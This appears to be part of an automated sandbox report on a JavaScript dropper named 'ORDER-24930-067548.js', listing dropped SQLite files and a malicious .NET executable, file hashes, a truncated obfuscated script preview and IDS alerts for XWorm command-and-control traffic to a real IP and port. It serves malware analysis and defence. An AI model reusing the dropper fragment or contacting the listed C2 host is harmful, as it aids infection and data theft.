                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                        MD5:64BCCF32ED2142E76D142DF7AAC75730
                        SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                        SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                        SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\tmp4638.tmp.dat

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\tmp5E07.tmp.dat

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.8475592208333753
                        Encrypted:false
                        SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
                        MD5:BE99679A2B018331EACD3A1B680E3757
                        SHA1:6E6732E173C91B0C3287AB4B161FE3676D33449A
                        SHA-256:C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
                        SHA-512:9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\tmp5E27.tmp.dat

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):159744
                        Entropy (8bit):0.5394293526345721
                        Encrypted:false
                        SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                        MD5:52701A76A821CDDBC23FB25C3FCA4968
                        SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                        SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                        SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                        Malicious:false
                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\tmp5E37.tmp.dat

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1373607036346451
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                        MD5:64BCCF32ED2142E76D142DF7AAC75730
                        SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                        SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                        SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\tmp5F04.tmp.dat

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):98304
                        Entropy (8bit):0.08235737944063153
                        Encrypted:false
                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\tmp5F14.tmp.dat

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):5242880
                        Entropy (8bit):0.03708713717387235
                        Encrypted:false
                        SSDEEP:192:58rJQaXoMXp0VW9FxW/Hy4XJwvnzfXfYf6zfTfN/0DApVJCI:58r54w0VW3xW/bXWzvACzbJ0DApVJ
                        MD5:85D6E1D7F82C11DAC40C95C06B7B5DC5
                        SHA1:96EA790BA7A295D78AD5A5019D7EA5E9E8F4B0BD
                        SHA-256:D9AD18D2A91CB42FD55695B562D76337BBB4A6AEB45D28C4554297B4EE0DC800
                        SHA-512:5DD2B75138EFB9588E14997D84C23C8225F9BFDCEA6A2A1D542AD2C6728484E7E578F06C4BA238853EAD9BE5F9A7CCCF7B2B49A0583FF93D67F072F2C5165B14
                        Malicious:false
                        Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\tmp5F83.tmp.dat

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                        Category:dropped
                        Size (bytes):196608
                        Entropy (8bit):1.1209886597424439
                        Encrypted:false
                        SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                        MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                        SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                        SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                        SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                        Malicious:false
                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\tmp5F93.tmp.dat

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                        Category:dropped
                        Size (bytes):196608
                        Entropy (8bit):1.1209886597424439
                        Encrypted:false
                        SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                        MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                        SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                        SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                        SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                        Malicious:false
                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\tmp5FA4.tmp.dat

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):51200
                        Entropy (8bit):0.8746135976761988
                        Encrypted:false
                        SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                        MD5:9E68EA772705B5EC0C83C2A97BB26324
                        SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                        SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                        SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\tmp5FA5.tmp.dat

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):155648
                        Entropy (8bit):0.5407252242845243
                        Encrypted:false
                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                        MD5:7B955D976803304F2C0505431A0CF1CF
                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                        Malicious:false
                        Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Roaming\Service.exe

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):59904
                        Entropy (8bit):7.846014380238068
                        Encrypted:false
                        SSDEEP:1536:E8ZVRAKxLzsP5+tNJqqVOd39lS7OhRHgTy8:FRVxLzmEtNJRVOV9SOHH2y8
                        MD5:7284765CA4D2F85C487796F437B01822
                        SHA1:F1E51F7E021629857369888A16E201FB464B7A61
                        SHA-256:680ED672969AC8F7D533B74B27B152F4608EF9BBA02F48935829455190B1E996
                        SHA-512:17D1DF0DF786D7BFFF9EE7618EA0CC442804B03BD6F35F13F8BBE6DD7FFA581C663D724989038A163D9B3B116EEDEF198EE084A87B6E799A4C97984304469B32
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..f............................n.... ........@.. .......................@............@................................. ...K.......H.................... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...H...........................@..@.reloc....... ......................@..B................P.......H........................#..|............................................0..........r...p(....s.......o....t......*..0..........s....&..+.(....,.*..X...2.*..0..........rC..p(.....r...p(......r...pr...p(......r...pr...p(......(......r+..po......rM..po....................(....o........rU..p..................o....&(....(.............o....(...........*...................*...0..'.......~....rW..po......r...pr...po.....o....*..0..........(....s......(....*"..o....*..0..".......~...

                        C:\Windows\System32\wbem\Performance\WmiApRpl_new.h

                        Download File
                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):3444
                        Entropy (8bit):5.011954215267298
                        Encrypted:false
                        SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                        MD5:B133A676D139032A27DE3D9619E70091
                        SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                        SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                        SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                        Malicious:false
                        Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

                        C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini

                        Download File
                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:modified
                        Size (bytes):950
                        Entropy (8bit):2.8937402169492104
                        Encrypted:false
                        SSDEEP:12:Q1NXCaAGaCGopGGD1JTi0SMfmCwOx6ivzivG:Q3wU/IM1x6ozoG
                        MD5:9D007E669CE25371EE9401DC2AC21D2A
                        SHA1:6F0CACCD76F7A94BBCB1124D398E9139E09C6FC4
                        SHA-256:632004D14715476801408FC10E1B119BDC90378D2E8D573B7C14A06816799FA8
                        SHA-512:AB9FEA61D8C00701E402D700873CA2B9A4FFB7D62557A2ED1C86571DCC40D3C33F7B7E358DF506C134EE4ABEE39B1167846C64A34FA19448FD1DC36AF19F579C
                        Malicious:false
                        Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........

                        C:\Windows\system32\wbem\Performance\WmiApRpl.h (copy)

                        Download File
                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):3444
                        Entropy (8bit):5.011954215267298
                        Encrypted:false
                        SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                        MD5:B133A676D139032A27DE3D9619E70091
                        SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                        SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                        SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                        Malicious:false
                        Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

                        Static File Info

                        General

                        File type:ASCII text, with very long lines (7873), with CRLF line terminators
                        Entropy (8bit):3.4531804535577044
                        TrID:
                          File name:ORDER-24930-067548.js
                          File size:7'907 bytes
                          MD5:8fbf57ab035ec7063b9522e5f30a75f7
                          SHA1:cd761463221ba82f46b2b28fe56a0e74588c64b9
                          SHA256:ff84d777db298c70e206a94f1a4a1a5d5536d8cd42eedbd50ffde364daa368a6
                          SHA512:6fb68c7241c130973c1332a2f1c23c76cdb4640d76e270e1a0538a83001fe7d2aa4397ccb34def80ce88a5050f36d7bbaad7700fd9efa666c26bb0e6c4bc71d6
                          SSDEEP:96:lUu0CRu5u37arzWruLprCRuzrN+uQ6rgxX4murNdgCRufZQL76mXHNuipdWwp5i6:lUycqnDtjfQxaWpK+l
                          TLSH:16F1098C55B028323DA799E175D1EC0685C6ADD425EE007BE86A0C77B0699FF3DA14CF
                          File Content Preview:var P8q=163834344..var VGKGLV = String.fromCharCode(163834460-P8q,163834458-P8q,163834465-P8q,163834467-P8q,163834354-P8q,163834462-P8q,163834441-P8q,163834458-P8q,163834376-P8q,163834423-P8q,163834442-P8q,163834450-P8q,163834445-P8q,163834443-P8q,1638344

                          File Icon

                          Icon Hash:68d69b8bb6aa9a86

                          Network Behavior

                          Suricata IDS Alerts

                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-10-01T07:38:25.156317+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:38:25.502240+02002853192ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:38:29.771402+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:38:29.771402+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:38:33.846431+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:38:33.878120+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:38:44.077679+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:38:44.211472+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:38:44.293513+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:38:54.515877+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:38:54.517637+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:38:59.777922+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:38:59.777922+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:39:04.844685+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:39:04.846337+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:39:15.172918+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:39:15.176865+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:39:25.500425+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:39:25.503142+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:39:29.787232+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:39:29.787232+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:39:30.844277+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:39:30.846498+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:39:31.219064+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:39:31.220824+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:39:41.547534+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:39:41.549589+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:39:51.017560+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:39:51.019271+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:39:51.484675+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:39:51.486893+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:39:59.801507+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:39:59.801507+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:40:01.328879+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:40:01.330625+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:40:06.672378+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:40:06.674792+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:40:06.740625+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:40:06.742455+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:40:06.766574+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:40:06.768227+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:40:06.817138+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:40:06.820034+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:40:06.933771+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:40:06.937262+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:40:08.127213+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:40:08.131437+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:40:17.672423+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:40:17.677217+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:40:17.769399+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:40:17.773189+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:40:18.156773+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:40:18.158722+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705194.37.97.1506980TCP
